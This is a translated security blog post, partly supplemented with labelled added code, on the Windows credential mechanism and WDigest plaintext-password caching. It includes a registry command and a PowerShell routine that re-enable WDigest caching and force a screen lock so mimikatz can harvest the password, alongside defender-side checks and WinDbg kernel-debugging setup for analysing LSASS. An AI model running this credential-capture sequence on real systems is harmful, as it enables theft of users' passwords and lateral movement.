Analysis of Windows Credentials Mechanism

Job-hunting ad (haha): the blogger, 23, works in web security and is looking for a job. I have a bachelor's degree and did an internship at a large company. If any senior engineer is hiring or can give a referral, please contact me on WeChat to get my resume: ocean888-_-

On Windows 8.1 / Server 2012 R2 and later (including Windows 10), WDigest credential caching is disabled by default, so mimikatz cannot read the plaintext logon password out of LSASS. To capture the plaintext you have to re-enable caching through the registry (UseLogonCredential) and then wait for a fresh logon. This article uses WinDbg to look at what actually changes in LSASS memory when that is done.

Let's take a look at the basics of the Windows credential mechanism before debugging

Windows Credentials Mechanism

Key components

SAM file

SAM (Security Account Manager) is the database in which Windows stores local account password material. To avoid keeping plaintext on disk, the SAM stores hashes derived from the password: the LM hash (obsolete, and not generated by default on modern systems) and the NT hash (commonly called the NTLM hash), which is a 128-bit MD4 digest of the UTF-16LE encoded password, displayed as 32 hexadecimal characters. It is unsalted, so two accounts with the same password have the same NT hash. When a user logs on, the hash computed from the entered password is compared with the one stored in the SAM. On later Windows versions the hashes in the SAM are additionally encrypted with the SYSKEY (boot key), which is derived from the SYSTEM hive; this is why dumping the SAM offline requires both the SAM and SYSTEM hives.

  • The SAM hive lives on disk at C:\Windows\System32\config\SAM and is mounted in the registry as HKLM\SAM
  • Once Windows is running the file is held open exclusively by the system, so it cannot be moved or copied directly; an administrator can still export it with reg save, or take it from a Volume Shadow Copy
  • The SAM holds the hashes of local user and built-in accounts only. Service account passwords, scheduled task credentials and saved application passwords (browser, SQL, etc.) are not in the SAM: they are kept as LSA secrets in the SECURITY hive or in Credential Manager (DPAPI)

LSASS process

The Local Security Authority Subsystem Service (lsass.exe) enforces the local security policy: it authenticates interactive and network logons, handles password changes, creates access tokens, and hosts the security support providers (SSPs) such as msv1_0, kerberos and wdigest. When people talk about "dumping lsass" they mean dumping the process memory to recover the credential material cached in it: NT hashes, Kerberos tickets and, where WDigest caching is on, plaintext passwords.

Windows authentication process

Windows local authentication

[Figure: Windows local logon flow (screenshot not reproduced)]

The Windows local logon flow is shown in the figure above. After boot or logoff the logon UI is displayed; winlogon.exe manages user logon and logoff. When the user enters a password, the following happens:

  1. winlogon.exe (via LogonUI and the credential provider) passes the account name and password to lsass.exe. The registered SSPs receive the plaintext, and WDigest, if caching is enabled, keeps a copy of it in process memory
  2. lsass.exe computes the NT hash of the password and compares it with the hash stored in the SAM database

If the two hashes match the logon succeeds, otherwise it fails. Two weaknesses follow from this design:

  1. lsass.exe keeps credential material in its memory, including the plaintext password on older systems (or wherever WDigest caching is on). This is why mimikatz can read the plaintext straight out of LSASS on those systems
  2. Authentication is decided by comparing NT hashes, and the NT hash is also the key material used by the NTLM network protocol. An attacker who obtains the hash (from the SAM, from LSASS, or from a memory dump) can authenticate to other systems on the network without ever knowing the password itself: the pass-the-hash (PtH) attack
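The hash that step 2 computes, and that the SAM stores, as an added example (not code from the original post): NT hash = MD4 of the UTF-16LE password, with no salt. .NET ships no MD4 provider, so this block carries its own MD4 following RFC 1320; the function names are this example's own, and the two values in the trailing comments are the well-known NT hashes of "password" and of the empty password.

```powershell
# Added example (not from the original post): compute the NT hash that LSASS derives from a
# logon password and that the SAM stores. NT hash = MD4(UTF-16LE(password)), unsalted.
# .NET has no MD4 provider, so a small MD4 (RFC 1320) is implemented here in PowerShell.

function Invoke-Md4 {
    param([byte[]]$Bytes)
    $M = ([long]1 -shl 32) - 1                       # 32-bit mask; all arithmetic done in [long]
    function RotL([long]$x, [int]$s) { (($x -shl $s) -bor ($x -shr (32 - $s))) -band $M }
    function Md4F($x, $y, $z) { ($x -band $y) -bor (($x -bxor $M) -band $z) }
    function Md4G($x, $y, $z) { ($x -band $y) -bor ($x -band $z) -bor ($y -band $z) }
    function Md4H($x, $y, $z) { $x -bxor $y -bxor $z }

    # Padding: 0x80, zeros up to 56 mod 64, then the 64-bit little-endian bit length
    $len    = $Bytes.Length
    $padLen = (56 - ($len + 1) % 64 + 64) % 64
    $msg    = [byte[]]::new($len + 1 + $padLen + 8)
    [Array]::Copy($Bytes, $msg, $len)
    $msg[$len] = 0x80
    $bitLen = [long]$len * 8
    for ($i = 0; $i -lt 8; $i++) { $msg[$msg.Length - 8 + $i] = [byte](($bitLen -shr (8 * $i)) -band 0xFF) }

    $A = 0x67452301; $B = 4023233417; $C = 2562383102; $D = 0x10325476   # B = 0xefcdab89, C = 0x98badcfe
    $s1 = 3,7,11,19
    $k2 = 0,4,8,12,1,5,9,13,2,6,10,14,3,7,11,15;  $s2 = 3,5,9,13
    $k3 = 0,8,4,12,2,10,6,14,1,9,5,13,3,11,7,15;  $s3 = 3,9,11,15

    for ($off = 0; $off -lt $msg.Length; $off += 64) {
        $X = [long[]]::new(16)                        # sixteen little-endian 32-bit words
        for ($j = 0; $j -lt 16; $j++) {
            $o = $off + 4 * $j
            $X[$j] = [long]$msg[$o] -bor ([long]$msg[$o+1] -shl 8) -bor ([long]$msg[$o+2] -shl 16) -bor ([long]$msg[$o+3] -shl 24)
        }
        $a = $A; $b = $B; $c = $C; $d = $D
        for ($i = 0; $i -lt 16; $i++) {               # round 1
            $t = RotL (($a + (Md4F $b $c $d) + $X[$i]) -band $M) ($s1[$i % 4])
            $a = $d; $d = $c; $c = $b; $b = $t
        }
        for ($i = 0; $i -lt 16; $i++) {               # round 2
            $t = RotL (($a + (Md4G $b $c $d) + $X[$k2[$i]] + 0x5A827999) -band $M) ($s2[$i % 4])
            $a = $d; $d = $c; $c = $b; $b = $t
        }
        for ($i = 0; $i -lt 16; $i++) {               # round 3
            $t = RotL (($a + (Md4H $b $c $d) + $X[$k3[$i]] + 0x6ED9EBA1) -band $M) ($s3[$i % 4])
            $a = $d; $d = $c; $c = $b; $b = $t
        }
        $A = ($A + $a) -band $M; $B = ($B + $b) -band $M; $C = ($C + $c) -band $M; $D = ($D + $d) -band $M
    }
    $out = [byte[]]::new(16); $n = 0                  # digest is A,B,C,D, each little-endian
    foreach ($v in $A, $B, $C, $D) {
        for ($j = 0; $j -lt 4; $j++) { $out[$n++] = [byte](($v -shr (8 * $j)) -band 0xFF) }
    }
    return ,$out
}

function Get-NtHash {
    param([Parameter(Mandatory)][AllowEmptyString()][string]$Password)
    # UTF-16LE, no terminator, no salt: the same password always gives the same 32 hex chars
    $utf16 = [System.Text.Encoding]::Unicode.GetBytes($Password)
    return (Invoke-Md4 -Bytes $utf16 | ForEach-Object { $_.ToString('x2') }) -join ''
}

Get-NtHash 'password'   # 8846f7eaee8fb117ad06bdd830b7586c (well-known value)
Get-NtHash ''           # 31d6cfe0d16ae931b73c59d7e0c089c0 (blank password)
```

Because there is no salt and no iteration, the hash is all an attacker needs: it can be replayed directly in NTLM authentication (pass-the-hash) or cracked offline at MD4 speed.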

Supplement: besides local authentication there is network authentication based on the NTLM protocol and domain authentication based on the Kerberos protocol.

What is Wdigest?

WDigest implements Digest Authentication (RFC 2617 / RFC 2831), a challenge/response protocol that Windows Server 2003 introduced mainly for LDAP and web (HTTP) authentication; it is used through HTTP and SASL exchanges. The problem is that the WDigest SSP keeps the user's logon password in LSASS memory (reversibly encrypted, so it can be recovered), and it does so whether or not any application ever uses Digest authentication.

On Windows 7 / Server 2008 R2 and earlier, WDigest caching is on by default and there was originally no way to turn it off. Microsoft's update KB2871997 (2014) adds the UseLogonCredential registry value to those systems; after installing it, setting the value to 0 disables the caching. Windows 8.1 / Server 2012 R2 and later ship with the caching disabled by default.

So on Windows 10 / Server 2012 R2 and later, where WDigest caching is off, capturing a plaintext password takes: set the registry value to 1, force the session to lock (or wait for it to lock), wait for the target user (e.g. an administrator) to unlock or log on again, and then read the plaintext from LSASS. The registry change by itself yields nothing, because WDigest only caches passwords that reach it after the value is set; and the change is a well-known indicator that defenders watch for (registry auditing, Sysmon Event ID 13 on this key).

Command to modify the registry:

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

The same value can also be set from PowerShell, Metasploit, and so on.
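The PowerShell version of the registry change above, together with the lock step and a defender-side check, as an added example (not code from the original post). The key and value names are Microsoft's; the function names are this example's own. It assumes an elevated PowerShell on the target.

```powershell
# Added example (not from the original post): inspect, weaken and re-harden the WDigest
# UseLogonCredential value from PowerShell, and lock the session so that the next unlock
# hands the password to the WDigest SSP again. Needs an elevated PowerShell; the function
# names are this example's own, the key and value names are Microsoft's.
$WDigestKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'
$ValueName  = 'UseLogonCredential'

function Get-WDigestCachingState {
    # Returns 'Enabled', 'Disabled' or 'NotSet'. Note the OS-dependent meaning of 'NotSet':
    # on Windows 8.1 / 2012 R2 and later an absent value means caching is OFF, while on
    # Windows 7 / 2008 R2 with KB2871997 installed an absent value still means caching is ON.
    $item = Get-ItemProperty -Path $WDigestKey -Name $ValueName -ErrorAction SilentlyContinue
    if ($null -eq $item) { return 'NotSet' }
    if ([int]$item.$ValueName -eq 1) { return 'Enabled' }
    return 'Disabled'
}

function Set-WDigestCaching {
    param([Parameter(Mandatory)][ValidateSet('Enabled', 'Disabled')][string]$State)
    $data = if ($State -eq 'Enabled') { 1 } else { 0 }
    if (-not (Test-Path $WDigestKey)) { New-Item -Path $WDigestKey -Force | Out-Null }
    # Same effect as: reg add HKLM\...\WDigest /v UseLogonCredential /t REG_DWORD /d <0|1> /f
    Set-ItemProperty -Path $WDigestKey -Name $ValueName -Value $data -Type DWord
    return (Get-WDigestCachingState)
}

function Invoke-WDigestCaptureSetup {
    # Attacker-side sequence from the post: flip the value to 1, then force the lock screen.
    # No reboot is needed, but nothing is cached until a user authenticates again, which is
    # why the lock (and the victim's unlock) is part of the technique.
    Set-WDigestCaching -State Enabled | Out-Null
    rundll32.exe user32.dll,LockWorkStation
    # ...wait for the user to unlock, then: mimikatz "privilege::debug" "sekurlsa::wdigest"
}

function Repair-WDigestCaching {
    # Defender-side check: report and, if needed, restore the hardened value 0.
    if ((Get-WDigestCachingState) -eq 'Enabled') { return (Set-WDigestCaching -State Disabled) }
    return 'AlreadyHardened'
}

"WDigest caching: $(Get-WDigestCachingState)"
```

Run Invoke-WDigestCaptureSetup only in a lab. Two practical caveats: LockWorkStation locks the calling session only, so from a remote or SYSTEM shell it will not lock the console user's desktop; and the write to this key is exactly what registry auditing or a Sysmon Event ID 13 rule on the WDigest key will flag, so Repair-WDigestCaching is the piece a detection playbook would run.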

For a source-level walkthrough of how mimikatz implements sekurlsa::wdigest, see: Debugging mimikatz source code: wdigest function source code debugging detailed process and analysis

WinDbg debugging

WinDbg is Microsoft's free source-level debugger. It supports both kernel-mode and user-mode debugging and can also analyse dump files.

Official documentation and download: https://docs.microsoft.com/zh-cn/windows-hardware/drivers/debugger/debugger-download-tools

You cannot simply attach WinDbg to lsass.exe as a user-mode debugger on a live system: LSASS is a critical process, and while it is stopped in the debugger Windows complains and warns the user that the system is about to restart. On hardened systems where LSASS runs as a protected process (RunAsPPL), a user-mode debugger cannot attach at all. So we attach a kernel debugger instead and switch from ring 0 into the context of the lsass process.

Two-machine remote debugging environment construction

Lab environment

  • Windows 11 physical machine + windbg
  • Windows 10 virtual machine (bridged mode)

Microsoft's documentation describes two transports for the connection between the host and the target:

The older setup uses a COM (serial) interface; the newer one uses a network connection.

I use the most basic COM serial-port connection, configured as follows.

  1. Add a serial port to the target VM backed by a named pipe: the name must start with \\.\pipe\, and the rest can be anything short and easy to remember

    [Screenshot of the VM serial port settings (not reproduced)]

  2. Configure the boot debug settings on the target machine

    Use bcdedit to create a new boot entry for debugging, copied from the default one. ({default} is a well-known alias, which is why that name never shows up in the output of bcdedit /enum; the listing shows the entry under its GUID or as {current}.)

    bcdedit /copy {default} /d "vmdebug"
    

    The entry was successfully copied to {7985b4ec-581d-11ec-bee9-8214e8b021aa}

    Copy this GUID to a file on the host machine; the later commands need it.

    If you reboot now the boot menu has one more entry, but you will never see it: the menu needs a timeout so that the system pauses on the entry selection screen.

    bcdedit /timeout 10
    

    With the timeout set, the boot menu waits 10 seconds and boots the default entry when the time runs out.

    [Screenshot of the boot menu (not reproduced)]

    After the restart, boot from the vmdebug entry and put that entry into debug mode, so that the default entry's environment is left untouched:

    bcdedit /dbgsettings serial baudrate:115200 debugport:2
    

    debugport is the COM port number of the serial device added to the VM, not the pipe name. The screenshot from step 1 shows it as serial port 2, so debugport is 2. If you are not sure, set one value; if the debugger does not connect, re-run the command with the other port number.

    bcdedit /debug {ID} ON
    

    The ID is the GUID printed by bcdedit /copy when vmdebug was created; it can also be looked up with bcdedit /enum.

    Restart and stop at the boot menu.

  3. Connect with WinDbg

    [Screenshot of the WinDbg kernel connection dialog (not reproduced)]

    If it keeps saying "busy", press Ctrl+Break to break in (on compact 87-key keyboards without a Break key, use Fn+Pause); you then land in the kernel debugger.

    [Screenshot of the debugger after breaking in (not reproduced)]
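The target-side part of step 2, scripted so that the new entry's GUID is parsed out of the bcdedit output instead of being copied by hand, as an added example (not from the original post). It assumes an elevated PowerShell on the target VM, a VM serial device on COM2 (debugport:2) as in the post, and the post's own entry name "vmdebug"; the function names are this example's own.

```powershell
# Added example (not from the original post): script the target-VM side of step 2 above
# instead of copying the new entry's GUID out of the console by hand. Assumptions: runs in
# an elevated PowerShell on the target VM; the VM serial device is COM2 (debugport:2) as in
# the post; "vmdebug" is the post's own entry name; the function names are this example's.
$Description = 'vmdebug'
$DebugPort   = 2        # COM port number of the VM's serial device, not the named pipe
$MenuTimeout = 10

function New-DebugBootEntry {
    param([string]$Description)
    # bcdedit /copy prints "The entry was successfully copied to {GUID}."; the text is
    # localised, so only the GUID is matched. {default} must be quoted in PowerShell,
    # otherwise the braces are parsed as a script block.
    $out = & bcdedit /copy '{default}' /d $Description 2>&1 | Out-String
    if ($out -match '\{[0-9a-fA-F]{8}(-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}\}') { return $Matches[0] }
    throw "bcdedit /copy did not return an entry GUID: $out"
}

function Enable-KernelDebugEntry {
    param([string]$EntryId, [int]$DebugPort)
    # /dbgsettings is global (transport only); /debug ON is per entry, so the copied entry
    # boots with the kernel debugger enabled while {default} is left untouched.
    & bcdedit /dbgsettings serial baudrate:115200 "debugport:$DebugPort" | Out-Null
    & bcdedit /debug $EntryId ON | Out-Null
}

function Test-KernelDebugEntry {
    param([string]$EntryId)
    # Returns $true when the entry's listing shows "debug Yes" (English bcdedit output).
    $listing = & bcdedit /enum $EntryId | Out-String
    return [bool]($listing -match '(?m)^debug\s+Yes')
}

$id = New-DebugBootEntry -Description $Description
& bcdedit /timeout $MenuTimeout | Out-Null
Enable-KernelDebugEntry -EntryId $id -DebugPort $DebugPort
"Created $id; debug enabled: $(Test-KernelDebugEntry -EntryId $id)"
& bcdedit /dbgsettings     # confirm baudrate and debugport before rebooting into the entry
```

If the debugger never connects, the usual culprit is the debugport number not matching the COM port the VM assigned to the pipe-backed serial device; re-run the script with the other port number, as the post suggests.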

Tips:

  1. Breaking into the kernel and switching into a process context requires two-machine debugging; a local kernel debugger (windbg -kl) is read-only and cannot break in
  2. WinDbg Preview is easier to use than the classic version
  3. Wait until the system has reached the logon screen before breaking in, so that lsass and its SSPs are fully initialised

Debug analysis

Command-line reference

WinDbg Command Manual

Detailed use of windbg

  1. After breaking into the kernel debugger, find the EPROCESS address of lsass.exe with !process 0 0 lsass.exe

  2. With the EPROCESS address known (ffff9d01325a7080 in this session), ask the debugger to switch into the context of lsass:

    .process /i /p /r ffff9d01325a7080
    

    /i makes the switch invasive (the debugger breaks in with lsass as the current process), /p resolves user-mode addresses through that process's page tables, and /r reloads the user-mode symbols. The switch only takes place on the next resume, so follow the command with g; the debugger then breaks again inside lsass

  3. Confirm the context with lm, which lists the modules loaded in the current process: in lsass you should see user-mode DLLs such as lsasrv.dll and wdigest.dll next to the kernel modules

Dumping credentials with mimikatz (sekurlsa::wdigest) before enabling UseLogonCredential: the wdigest entry for the logged-on user carries no plaintext password

[Screenshot of the mimikatz output (not reproduced)]

Enable UseLogonCredential in the registry and look at how the memory changes

(Image credit: Anke)

Lock the screen, wait for the user to log on again, then dump again: the wdigest entry now carries the plaintext password that the SSP cached at that logon

About how the mimikatz wdigest module is implemented, you can see the following two analysis articles:

Exploring Mimikatz - Part 1 - WDigest

An in-depth analysis of Mimikatz: WDigest

Reference links

Windows Credentials Mechanism

Use WinDbg local kernel debugger to attack Windows kernel


Source: blog.csdn.net/q20010619/article/details/126957361